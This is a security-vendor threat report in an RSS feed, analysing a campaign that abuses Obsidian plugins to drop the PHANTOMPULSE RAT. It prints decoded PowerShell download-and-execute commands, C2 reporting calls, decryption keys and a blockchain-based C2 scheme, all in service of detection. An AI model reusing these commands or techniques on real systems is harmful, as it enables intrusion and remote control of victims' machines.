<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
    <channel>
        <title>Elastic Security Labs</title>
        <link>https://www.elastic.co/security-labs</link>
        <description>Trusted security news &amp; research from the team at Elastic.</description>
        <lastBuildDate>Mon, 13 Apr 2026 18:54:47 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>https://github.com/jpmonette/feed</generator>
        <image>
            <title>Elastic Security Labs</title>
            <url>https://www.elastic.co/security-labs/assets/security-labs-thumbnail.png</url>
            <link>https://www.elastic.co/security-labs</link>
        </image>
        <copyright>© 2026 Elasticsearch B.V. All Rights Reserved</copyright>
        <item>
            <title><![CDATA[Phantom in the vault: Obsidian abused to deliver PhantomPulse RAT]]></title>
            <link>https://www.elastic.co/security-labs/phantom-in-the-vault</link>
            <guid>phantom-in-the-vault</guid>
            <pubDate>Tue, 14 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs uncovers a novel social engineering campaign that abuses the legitimate community plugin ecosystem of the popular note-taking application Obsidian. The campaign, which we track as REF6598, targets individuals in the financial and cryptocurrency sectors through elaborate social engineering on LinkedIn and Telegram.]]></description>
            <content:encoded><![CDATA[<blockquote>
<p>A follow-up publication will provide a deeper technical analysis of PHANTOMPULSE itself, covering its injection engines, persistence internals, and C2 protocol in greater detail.</p>
</blockquote>
<h2>Preamble</h2>
<p>Elastic Security Labs has identified a novel social engineering campaign that abuses the popular note-taking application, <a href="https://obsidian.md/">Obsidian</a>, as an initial access vector. The campaign, which we track as REF6598, targets individuals in the financial and cryptocurrency sectors through elaborate social engineering on LinkedIn and Telegram. The threat actors abuse Obsidian's legitimate community plugin ecosystem, specifically the <a href="https://github.com/Taitava/obsidian-shellcommands">Shell Commands</a> and <a href="https://github.com/kepano/obsidian-hider">Hider</a> plugins, to silently execute code when a victim opens a shared cloud vault.</p>
<p>In the observed intrusion, Elastic Defend detected and blocked the attack at the early stage, preventing the threat actors from achieving their objectives on the victim's machine.</p>
<p>The attack chain is cross-platform, with dedicated execution paths for both Windows and macOS. On Windows, an intermediate loader decrypts and reflectively loads payloads entirely in memory, using AES-256-CBC decryption, timer queue callback execution, and multiple anti-analysis techniques. The chain culminates in the deployment of a previously undocumented RAT we are naming <strong>PHANTOMPULSE</strong>, a heavily AI-generated, full-featured backdoor with blockchain-based C2 resolution and advanced process injection via module stomping. On macOS, the attack deploys an obfuscated AppleScript dropper with a Telegram-based fallback C2 resolution mechanism.</p>
<p>This post will detail the full attack chain, from social engineering through final payload analysis, and provide detection guidance and indicators of compromise.</p>
<h2>Key takeaways</h2>
<ul>
<li>PHANTOMPULSE is a novel, AI-assisted Windows RAT featuring blockchain-based C2 resolution via Ethereum transaction data and distinct injection techniques</li>
<li>We identified a weakness in the C2 mechanism that allows for a takeover of the implants by responders</li>
<li>Obsidian was abused as the initial access vector in a social engineering attack</li>
<li>The attack chain is cross-platform, targeting both Windows and macOS</li>
<li>The macOS payload uses a multi-stage AppleScript dropper with a Telegram dead-drop for fallback C2 resolution</li>
<li>PHANTOMPULL is a custom in-memory loader that delivers PHANTOMPULSE</li>
</ul>
<h2>Campaign overview</h2>
<p>The threat actors operate under the guise of a venture capital firm, initiating contact with targets through LinkedIn. After initial engagement, the conversation moves to a Telegram group where multiple purported partners participate, lending credibility to the interaction. The discussion centers around financial services, specifically cryptocurrency liquidity solutions, creating a plausible business context.</p>
<p>The target is asked to use <a href="https://obsidian.md/">Obsidian</a>, presented as the firm's &quot;management database&quot;, for accessing a shared dashboard. The target is provided credentials to connect to a cloud-hosted vault controlled by the attacker.</p>
<p>This vault is the initial access vector. Once opened in Obsidian, the target is instructed to enable community plugins sync. After that, the trojanized plugins silently execute the attack chain.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image16.png" alt="Execution chain diagram" title="Execution chain diagram" /></p>
<h2>Initial access</h2>
<p>An Elastic Defend behavior alert triggered on suspicious PowerShell execution with Obsidian as the parent process. This immediately caught our attention. Initially, we suspected an untrusted binary masquerading as Obsidian. However, after inspecting the parent process code signature and hash, it appeared to be the legitimate Obsidian binary.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image38.png" alt="Process visualization with Elastic XDR" title="Process visualization with Elastic XDR" /></p>
<p>Pivoting on the process event call stack to determine whether a third-party DLL sideload or unbacked memory region was involved, we confirmed that the process creation originated directly from Obsidian itself.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image30.png" alt="Elastic alert document showcasing the call stack" title="Elastic alert document showcasing the call stack" /></p>
<p>We then investigated the surrounding files for signs of JavaScript injection via modification of dependency files or malicious .asar file planting. Everything appeared to be a clean, legitimate Obsidian installation with no third-party code. At that point, we decided to install Obsidian ourselves and explore what options an attacker could abuse to achieve command execution.</p>
<p>The first thing that stood out was the ability to log in to an Obsidian-synced vault with an email and password.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image14.png" alt="Obsidian menu to open a remote vault" title="Obsidian menu to open a remote vault" /></p>
<p>Obsidian's vault sync feature allows notes and files to be synchronized across devices and platforms. While reviewing the files of the malicious remote vault under the .obsidian config folder, we found evidence that the Shell Commands community plugin had been installed:</p>
<pre><code class="language-plaintext">C:\Users\user\Documents\&lt;redacted_vault_name&gt;\.obsidian\plugins\obsidian-shellcommands\data.json
</code></pre>
<p>The <a href="https://publish.obsidian.md/shellcommands/Index">Shell Commands plugin</a> allows users to execute platform-specific shell commands based on configurable triggers such as Obsidian startup, close, every N seconds, and others.</p>
<p>The contents of data.json confirmed our theory: the configured commands matched exactly what we had observed in the original PowerShell behavior alert.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image36.png" alt="Data.json content of the shell plugin" title="Data.json content of the shell plugin" /></p>
<p>To validate the full attack chain, we attempted to replicate the behavior end-to-end across two machines (a host and a VM) using a paid Obsidian Sync license. On the host, we installed the Shell Commands community plugin with a custom command configured to spawn <code>notepad.exe</code> on startup. On the VM, we logged in to the same Obsidian account and connected to the remote vault.</p>
<p>The synced vault on the VM received the base configuration files (<code>app.json</code>, <code>appearance.json</code>, <code>core-plugins.json</code>, <code>workspace.json</code>), but notably the <code>plugins/</code> directory and <code>community-plugins.json</code> were absent entirely. This is because Obsidian's Sync settings expose two separate toggles, &quot;Active community plugin list&quot; and &quot;Installed community plugins&quot;, both of which are disabled by default; they are local client-side preferences that do not propagate through sync.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image37.png" alt="Obsidian settings" title="Obsidian settings" /></p>
<p>As shown below, the plugins directory and the community-plugins.json manifest inside the .obsidian directory are not synced automatically.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image2.png" alt=".obsidian folder content" title=".obsidian folder content" /></p>
<p>However, once enabled, the Shell Commands plugin immediately triggers execution of attacker-defined commands on vault open:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image20.png" alt="Process tree" title="Process tree" /></p>
<p>This means an attacker cannot remotely force the installation or enablement of a community plugin via vault sync alone. The victim must manually enable the community plugin sync on their device before the weaponized plugin configuration pulls down and triggers execution.</p>
<p>In the case we investigated, the attacker provided Obsidian account credentials directly to the victim as part of a social engineering lure, likely instructing them to log in, enable community plugin sync, and connect to the pre-staged vault. Once those steps were completed, the Shell Commands plugin and its data.json configuration synced automatically, and on the next configured trigger, the payload executed without any further interaction.</p>
<p>While this attack requires social engineering to cross the community plugin sync boundary, the technique remains notable: it abuses a legitimate application feature as a persistence and command execution channel; the payload lives entirely within JSON configuration files that are unlikely to trigger traditional AV signatures; and execution is handed off by a signed, trusted Electron application, making parent-process-based detection the critical layer.</p>
<p>Alongside the Shell Commands plugin, the attacker used <a href="https://github.com/kepano/obsidian-hider">Hider</a> (v1.6.1), a UI-cleanup plugin that hides interface elements. With every concealment option enabled, the configuration is as follows:</p>
<pre><code class="language-json">{
  &quot;hideStatus&quot;: true,
  &quot;hideTabs&quot;: true,
  &quot;hideScroll&quot;: true,
  &quot;hideSidebarButtons&quot;: true,
  &quot;hideTooltips&quot;: true,
  &quot;hideFileNavButtons&quot;: true
}
</code></pre>
<h3>Windows execution chain</h3>
<h4>Stage 1</h4>
<p>The Shell Commands plugin's Windows command contained two <code>Invoke-Expression</code> calls with Base64-encoded strings that decode to the following:</p>
<pre><code class="language-Powershell">iwr http://195.3.222[.]251/script1.ps1 -OutFile $env:TEMP\tt.ps1 -UseBasicParsing
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File &quot;$env:TEMP\tt.ps1&quot;
</code></pre>
<p>This will download a second-stage PowerShell script from a hardcoded IP address and execute it.</p>
<h4>Stage 2</h4>
<p>The downloaded PowerShell script (<code>script1.ps1</code>) implements a loader-delivery mechanism with a built-in operator-notification system. The script uses <code>BitsTransfer</code> to download the next-stage binary and reports its progress to the C2.</p>
<pre><code class="language-Powershell">Import-Module BitsTransfer
Start-BitsTransfer -Source 'http://195.3.222[.]251/syncobs.exe?q=%23OBSIDIAN' `
  -Destination &quot;$env:TEMP\syncobs.exe&quot;
</code></pre>
<p>After the download, the script verifies the file's existence and reports the outcome to the C2 at <code>195.3.222[.]251/stuk-phase</code>. The character (<code>G</code> or <code>R</code>) prepended to each status message appears to declare <code>G</code>REEN or <code>R</code>ED as a status color code. The following is a table of all the status messages:</p>
<table>
<thead>
<tr>
<th align="center">Status Message</th>
<th align="center">Meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td align="center"><code>GFILE FOUND ON PC</code></td>
<td align="center">Binary downloaded successfully</td>
</tr>
<tr>
<td align="center"><code>RDOWNLOAD ERROR</code></td>
<td align="center">Download failed, retrying</td>
</tr>
<tr>
<td align="center"><code>RFATAL DOWNLOAD ERROR</code></td>
<td align="center">Download failed after retry</td>
</tr>
<tr>
<td align="center"><code>GLAUNCH SUCCESS</code></td>
<td align="center">Binary executed and child processes detected</td>
</tr>
<tr>
<td align="center"><code>RLAUNCH FAILED</code></td>
<td align="center">Binary failed to start within the timeout</td>
</tr>
<tr>
<td align="center"><code>GSESSION CLOSED</code></td>
<td align="center">Execution sequence completed</td>
</tr>
</tbody>
</table>
<p>The <code>tag</code> parameter (<code>Obsidian</code>) sent with each status update identifies the campaign or infection vector, suggesting the operators might be running multiple concurrent campaigns.</p>
<pre><code class="language-Powershell">if ($started) {
    Invoke-RestMethod -Uri &quot;http://195.3.222[.]251/stuk-phase&quot; -Method Post -Body @{ message = &quot;GLAUNCH SUCCESS&quot;; tag = $tag }
} else {
    Invoke-RestMethod -Uri &quot;http://195.3.222[.]251/stuk-phase&quot; -Method Post -Body @{ message = &quot;RLAUNCH FAILED&quot;; tag = $tag }
}
Start-Sleep -Seconds 3

Invoke-RestMethod -Uri &quot;http://195.3.222[.]251/stuk-phase&quot; -Method Post -Body @{ message = &quot;GSESSION CLOSED&quot;; tag = $tag }
</code></pre>
<h4>Loader - PHANTOMPULL</h4>
<p>This loader is a 64-bit Windows PE executable that extracts an AES-256-CBC-encrypted PE payload from its own resources, decrypts it, and reflectively loads it into memory. This in-memory payload then downloads the next stage from the domain (<code>panel.fefea22134[.]net</code>) over HTTPS.</p>
<p>The third-stage payload (PHANTOMPULSE) is then decrypted and loaded reflectively via <code>DllRegisterServer</code>. This loader, which we are calling PHANTOMPULL, includes runtime API resolution and timer-queue-based execution. The sample also includes minor forms of evasion and obfuscation, along with dead code; these serve as anti-analysis tricks intended to waste the analyst's time investigating the malware.</p>
<h3>Execution Flow</h3>
<h4>Stage 1</h4>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image25.png" alt="Execution flow via Stage 1" title="Execution flow via Stage 1" /></p>
<h4>Stage 2</h4>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image29.png" alt="Execution flow via Stage 2" title="Execution flow via Stage 2" /></p>
<h3>Fake Integrity Check</h3>
<p>The loader opens with a dead-code guard that compares <code>GetTickCount()</code> against the hex value <code>0xFFFFFFFE</code>, which corresponds to approximately 49.7 days of continuous system uptime, making the condition virtually unreachable. The guarded block contains convincing but unreachable anti-tamper functions designed to waste analysts' time during reverse engineering.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image23.png" alt="Fake Integrity check" title="Fake Integrity check" /></p>
<p>The <code>anti_tamper_integrity_checksum()</code> function is also strange; it doesn't actually hash any of the underlying bytes, but instead sums all the function addresses in the binary. The checksum is never compared to anything; this is likely another anti-analysis technique intended to waste analyst time and bloat the binary.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image1.png" alt="Integrity check summing up the function addresses" title="Integrity check summing up the function addresses" /></p>
<h3>API Hashing</h3>
<p>This loader resolves API functions dynamically at runtime using the <code>djb2</code> hashing algorithm with seed <code>0x4E67C6A7</code>. The following APIs were resolved:</p>
<ul>
<li><code>VirtualAlloc</code></li>
<li><code>VirtualProtect</code></li>
<li><code>VirtualFree</code></li>
<li><code>LoadLibraryA</code></li>
<li><code>GetProcAddress</code></li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image40.png" alt="Resolving API addresses" title="Resolving API addresses" /></p>
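<p>For illustration, the seeded djb2 scheme can be sketched in Python. The multiply-by-33-and-add variant and the use of the seed as the initial hash state are assumptions here, since the loader's exact variant is not reproduced above:</p>
<pre><code class="language-python">def djb2(data, seed=0x4E67C6A7):
    # Classic djb2 variant: state = state * 33 + byte, kept to 32 bits.
    # The seed replaces the traditional initial value of 5381 (assumed).
    h = seed
    for b in data:
        h = (h * 33 + b) % 0x100000000
    return h

# A loader like this stores only precomputed hashes, then walks export
# tables comparing djb2(export_name) against those constants.
print(hex(djb2(b'VirtualAlloc')))
</code></pre>
<p>Analysis tooling can precompute these hashes over common API names to recover the loader's import set without executing it.</p>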
<h3>Resource Extraction + Decryption</h3>
<p>PHANTOMPULL stores its encrypted in-memory payload inside its own resources.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image42.png" alt="RCDATA 101 via Resource Hacker" title="RCDATA 101 via Resource Hacker" /></p>
<p>In order to extract the bytes, it uses <code>FindResourceA</code>, locating the resource type <code>RT_RCDATA</code> under ID <code>101</code>. The resource is mapped into memory and copied into a region marked with <code>PAGE_READWRITE</code> permissions.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image33.png" alt="Resource Extraction" title="Resource Extraction" /></p>
<p>Next, the loader performs AES-256-CBC decryption using <code>BCryptOpenAlgorithmProvider</code>. The key is hardcoded in the <code>.rdata</code> section.</p>
<p><strong>Key:</strong>  <code>6a85736b64761a8b2aaeadc1c0087e1897d16cc5a9d49c6a6ea1164233bad206</code></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image27.png" alt="Embedded AES-256-CBC key" title="Embedded AES-256-CBC key" /></p>
<p>The IV is also hard-coded on the stack: <code>A6FA4ADFC20E8E6B77E2DD631DC8FF18</code><br />
<img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image7.png" alt="Bcrypt Crypto Details" title="Bcrypt Crypto Details" /></p>
<p>After decryption, the loader validates that the output is a valid PE by checking the MZ header magic value: a comparison instruction XORs a hard-coded value (<code>0xC1DF</code>) with <code>0x9B92</code>, yielding the PE magic header (<code>0x5A4D</code>). This is an example of the lightweight obfuscation efforts throughout the loader that often seem awkward and out of place.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image4.png" alt="Magic Header XOR calculation" title="Magic Header XOR calculation" /></p>
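<p>The arithmetic is straightforward to verify in Python:</p>
<pre><code class="language-python"># 0xC1DF is the stored constant, 0x9B92 the XOR mask from the loader.
value = 0xC1DF ^ 0x9B92
assert value == 0x5A4D  # the 16-bit word formed by the file bytes 'MZ'
print(hex(value))
</code></pre>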
<h3>Execution</h3>
<p>Rather than calling the payload directly (which is easily detected by sandboxes), the loader uses a timer queue callback. The 50ms delay and separate-thread execution can evade various security/sandbox tooling.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image9.png" alt="CreateTimerQueue functionality" title="CreateTimerQueue functionality" /></p>
<p>Inside the callback is the reflective PE-loading functionality, which is then used to execute the next stage.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image11.png" alt="Timer callback calling reflective PE loader" title="Timer callback calling reflective PE loader" /></p>
<p>This reflective loading function is the core execution component. It copies the PE headers, maps each section into memory, applies base relocations, resolves imports, and sets the final section protections — producing a fully functional, memory-resident PE that never touches disk.</p>
<p>Execution is then transferred to the second stage via an indirect <code>call rbp</code> instruction, where RBP holds the computed entry point address of the reflectively loaded PE.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image26.png" alt="Indirect call to second stage" title="Indirect call to second stage" /></p>
<h3>Second Stage</h3>
<p>The second stage is responsible for downloading the remotely hosted payload (PHANTOMPULSE) and for using a similar reflective-loading technique to launch the implant. This stage starts by creating a mutex whose name is derived from an XOR operation over two hard-coded global variables.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image6.png" alt="Mutex generation via XOR" title="Mutex generation via XOR" /></p>
<p>The mutex name for this sample is: <code>hVNBUORXNiFLhYYh</code></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image28.png" alt="Observed Mutex" title="Observed Mutex" /></p>
<p>After the mutex is created, this code enters a persistent loop that attempts to download the payload from the C2 server. If the download successfully returns a valid buffer, it breaks out and proceeds to the reflective loading stage.</p>
<p>On failure, the code employs an exponential backoff — starting with a 5-second sleep and multiplying by 1.5x on each retry, capping just under 5 minutes. This avoids a fixed beacon interval that would be trivially fingerprinted in network traffic.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image22.png" alt="Download and timeout functionality" title="Download and timeout functionality" /></p>
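<p>The retry schedule can be sketched as follows; the 300-second ceiling is an assumption based on the &quot;just under 5 minutes&quot; cap described above:</p>
<pre><code class="language-python">def backoff_schedule(attempts, base=5.0, factor=1.5, cap=300.0):
    # Start at 5 seconds and multiply by 1.5 on each retry; the cap
    # value is assumed from the reported ceiling of just under 5 minutes.
    delays = []
    delay = base
    for _ in range(attempts):
        delays.append(min(delay, cap))
        delay = delay * factor
    return delays

print(backoff_schedule(12))
</code></pre>
<p>The growing intervals defeat detections keyed on a fixed beacon period.</p>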
<p>The downloader functionality starts by decrypting the C2 and URL.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image35.png" alt="C2 and URL decryption functions" title="C2 and URL decryption functions" /></p>
<p>The C2 and URL are both decrypted using a simple string decryption function using a 16-byte rotating key (<code>f77c8e40dfc17be5e74d8679d5b35341</code>).</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image5.png" alt="XOR String decryption function" title="XOR String decryption function" /></p>
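<p>A rotating-key XOR of this kind is simple to reimplement for string recovery. A minimal Python sketch, using the 16-byte key recovered from the sample:</p>
<pre><code class="language-python">KEY = bytes.fromhex('f77c8e40dfc17be5e74d8679d5b35341')

def xor_rotate(data, key=KEY):
    # XOR each byte against the key, repeating the key every 16 bytes;
    # the same routine both encrypts and decrypts.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

# Round trip: applying the routine twice returns the original bytes.
sample = b'panel.fefea22134[.]net'  # domain from the sample, test data only
assert xor_rotate(xor_rotate(sample)) == sample
</code></pre>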
<p>Next, the malware builds the HTTPS request, appending the URI <code>/v1/updates/check?build=payloads</code> and setting the User-Agent (<code>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36</code>). This loader uses the WinHTTP library to connect to the C2 on port <code>443</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image34.png" alt="WinHTTP functionality used to download PHANTOMPULSE" title="WinHTTP functionality used to download PHANTOMPULSE" /></p>
<p>The malware takes the buffer returned from the remote C2 URL and decrypts the payload with a 16-byte XOR key (<code>dcf5a9b27cbeedb769ccc8635d204af9</code>).</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image19.png" alt="Payload Decryption via XOR" title="Payload Decryption via XOR" /></p>
<p>Below are the first bytes of the XOR-encoded payload:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image24.png" alt="Payload bytes before the XOR" title="Payload bytes before the XOR" /></p>
<p>Below are the first bytes after the XOR takes place:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image3.png" alt="Payload bytes after the XOR" title="Payload bytes after the XOR" /></p>
<p>After the download and XOR operations, PHANTOMPULL parses the payload and reflectively loads the DLL via <code>DllRegisterServer</code>.</p>
<p>By quickly checking the strings, we can see the main backdoor, PHANTOMPULSE:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image18.png" alt="PHANTOMPULSE Implant strings" title="PHANTOMPULSE Implant strings" /></p>
<h3>RAT - PHANTOMPULSE</h3>
<p>PHANTOMPULSE is a sophisticated 64-bit Windows RAT designed for stealth, resilience, and comprehensive remote access. The binary exhibits strong indicators of AI-assisted development: debug strings throughout the code are abnormally verbose, self-documenting, and follow a structured step-numbering pattern (<code>[STEP 1]</code>, <code>[STEP 1/3]</code>, <code>[STEP 2/3]</code>).</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image13.png" alt="PHANTOMPULSE implant or strings view" title="PHANTOMPULSE implant or strings view" /></p>
<p>During our research, we discovered that the C2 infrastructure had a publicly exposed panel branded as &quot;Phantom Panel&quot;, featuring a login page with username, password, and captcha fields. The panel's design and structure suggest it was also AI-generated, consistent with the development patterns observed in the RAT itself.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image15.png" alt="Malware panel" title="Malware panel" /></p>
<h4>C2 rotation through blockchain</h4>
<p>PHANTOMPULSE implements a decentralized C2 resolution mechanism using public blockchain infrastructure as a dead drop. The malware's primary method for obtaining its C2 URL is by resolving it from on-chain transaction data. A hardcoded C2 URL serves as a fallback if the blockchain resolution fails after repeated attempts.</p>
<p>The malware queries the Etherscan-compatible API (<code>/api?module=account&amp;action=txlist&amp;address=&lt;wallet&gt;&amp;page=1&amp;offset=1&amp;sort=desc</code>) on three Blockscout instances:</p>
<ul>
<li><code>eth.blockscout[.]com</code> (Ethereum L1)</li>
<li><code>base.blockscout[.]com</code> (Base L2)</li>
<li><code>optimism.blockscout[.]com</code> (Optimism L2)</li>
</ul>
<p>Each request fetches the most recent transaction associated with a hardcoded wallet address (<code>0xc117688c530b660e15085bF3A2B664117d8672aA</code>), which is itself XOR-encrypted in the binary. The malware parses the transaction's <code>input</code> data field from the JSON response, strips the <code>0x</code> prefix, hex-decodes the raw bytes, and XOR-decrypts the result using the wallet address as the XOR key. If the decrypted output begins with <code>http</code>, it is accepted as the new active C2 URL.</p>
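<p>The resolution steps above can be sketched in Python. Treating the ASCII wallet string itself as the repeating XOR key is an assumption, and the sinkhole URL below is purely hypothetical:</p>
<pre><code class="language-python">WALLET = '0xc117688c530b660e15085bF3A2B664117d8672aA'
KEY = WALLET.encode()  # assumed: the ASCII wallet string is the key

def decode_c2(tx_input):
    # Strip the '0x' prefix, hex-decode the calldata, then XOR with the
    # repeating wallet-address key.
    raw = bytes.fromhex(tx_input[2:])
    out = bytes(b ^ KEY[i % len(KEY)] for i, b in enumerate(raw))
    # The implant only accepts the result if it begins with 'http'.
    if out.startswith(b'http'):
        return out.decode('ascii', 'replace')
    return None

# Encoding works the same way, which is exactly what enables a takeover:
url = b'https://sinkhole.example/c2'  # hypothetical responder sinkhole
blob = '0x' + bytes(b ^ KEY[i % len(KEY)] for i, b in enumerate(url)).hex()
print(decode_c2(blob))
</code></pre>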
<p>This technique provides the operator with an infrastructure-agnostic rotation capability: publishing a new C2 endpoint requires only submitting a transaction with crafted calldata to the wallet on any of the three monitored chains. Because blockchain transactions are immutable and publicly accessible, the malware can always locate its C2 without relying on centralized infrastructure. The use of three independent chains adds redundancy: even if one chain's explorer is blocked or unavailable, the remaining two provide alternative resolution paths.</p>
<p>However, this design introduces a significant weakness. The Blockscout API returns all transactions involving the wallet address, both sent and received, sorted in reverse chronological order. The malware does not verify the sender of the transaction. This means any third party who knows the wallet address and the XOR key (both recoverable from the binary) can craft a transaction to the wallet containing a competing input payload. Because the malware always selects the most recent transaction, a single inbound transaction with a more recent timestamp would override the operator's intended C2 URL. In practice, this allows anyone to hijack the C2 resolution by submitting a sinkhole URL encoded with the same XOR scheme, effectively redirecting all infected hosts away from the attacker infrastructure.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image21.png" alt="Wallet transaction example" title="Wallet transaction example" /></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image41.png" alt="Xor decrypting the raw input" title="Xor decrypting the raw input" /></p>
<h4>C2 communication</h4>
<p>PHANTOMPULSE uses WinHTTP for C2 communication, dynamically loading <code>winhttp.dll</code> and resolving all required functions at runtime. The C2 infrastructure is built around five API endpoints:</p>
<table>
<thead>
<tr>
<th>Endpoint</th>
<th>Method</th>
<th>Purpose</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>/v1/telemetry/report</code></td>
<td>POST</td>
<td>Heartbeat with system telemetry</td>
</tr>
<tr>
<td><code>/v1/telemetry/tasks/&lt;id&gt;</code></td>
<td>GET</td>
<td>Command fetch</td>
</tr>
<tr>
<td><code>/v1/telemetry/upload/</code></td>
<td>POST</td>
<td>Screenshot/file upload</td>
</tr>
<tr>
<td><code>/v1/telemetry/result</code></td>
<td>POST</td>
<td>Command result delivery</td>
</tr>
<tr>
<td><code>/v1/telemetry/keylog/</code></td>
<td>POST</td>
<td>Keylog data upload</td>
</tr>
</tbody>
</table>
<p>The heartbeat sends comprehensive system telemetry as JSON, including CPU model, GPU, RAM, OS version, username, privilege level, public IP, installed AV products, installed applications, and the results of the last command execution.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image31.png" alt="System information collection" title="System information collection" /></p>
<h4>Command table</h4>
<p>The command dispatcher parses JSON responses from the C2 to extract and hash commands via the <code>djb2</code> algorithm. This hash is processed by a switch-case statement to execute the corresponding logic, as seen in the pseudocode below:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image32.png" alt="Pseudocode command dispatcher" title="Pseudocode command dispatcher" /></p>
<table>
<thead>
<tr>
<th>Hash</th>
<th>Command</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>0x04CF1142</code></td>
<td><code>inject</code></td>
<td>Inject shellcode/DLL/EXE into target process</td>
</tr>
<tr>
<td><code>0x7C95D91A</code></td>
<td><code>drop</code></td>
<td>Drop the file to the disk and execute</td>
</tr>
<tr>
<td><code>0x9A37F083</code></td>
<td><code>screenshot</code></td>
<td>Capture and upload a screenshot</td>
</tr>
<tr>
<td><code>0x08DEDEF0</code></td>
<td><code>keylog</code></td>
<td>Start/stop keylogger</td>
</tr>
<tr>
<td><code>0x4EE251FF</code></td>
<td><code>uninstall</code></td>
<td>Full persistence removal and cleanup</td>
</tr>
<tr>
<td><code>0x65CCC50B</code></td>
<td><code>elevate</code></td>
<td>Escalate to SYSTEM via COM elevation moniker</td>
</tr>
<tr>
<td><code>0xB3B5B880</code></td>
<td><code>downgrade</code></td>
<td>SYSTEM -&gt; elevated admin transition</td>
</tr>
<tr>
<td><code>0x20CE3BC8</code></td>
<td><code>&lt;unresolved&gt;</code></td>
<td>Resolves APIs, calls ExitProcess(0) self-termination</td>
</tr>
</tbody>
</table>
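<p>In effect, the dispatcher is a hash-keyed jump table. A hypothetical Python sketch of the pattern, using hash values from the table above (the handler bodies are placeholders):</p>
<pre><code class="language-python"># Placeholder handlers; the real capabilities are listed in the table.
def do_screenshot(args):
    return 'screenshot taken'

def do_keylog(args):
    return 'keylogger toggled'

def do_uninstall(args):
    return 'persistence removed'

HANDLERS = {
    0x9A37F083: do_screenshot,
    0x08DEDEF0: do_keylog,
    0x4EE251FF: do_uninstall,
}

def dispatch(cmd_hash, args=None):
    # Look up the precomputed command hash; unknown hashes fall through.
    handler = HANDLERS.get(cmd_hash)
    if handler is None:
        return 'unknown command'
    return handler(args)

print(dispatch(0x9A37F083))
</code></pre>
<p>Hashing command names keeps the plaintext strings out of the binary while keeping dispatch O(1).</p>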
<h3>macOS execution chain</h3>
<h4>Stage 1: AppleScript via osascript</h4>
<p>The Shell Commands plugin's macOS command executes a Base64-encoded payload through <code>osascript</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image10.png" alt="MacOS stage 1 payload" title="MacOS stage 1 payload" /></p>
<p>The decoded payload performs two primary actions:</p>
<p><strong>LaunchAgent persistence</strong>: Creates a persistent LaunchAgent plist at <code>~/Library/LaunchAgents/com.vfrfeufhtjpwgray.plist</code> configured with <code>KeepAlive</code> and <code>RunAtLoad</code> set to <code>true</code>, ensuring the second-stage payload executes on every login and restarts if terminated.</p>
<p><strong>Second-stage execution</strong>: The LaunchAgent executes a heavily obfuscated AppleScript dropper through <code>/bin/bash -c</code> piped into <code>osascript</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image12.png" alt="MacOS stage 1 payload decoded" title="MacOS stage 1 payload decoded" /></p>
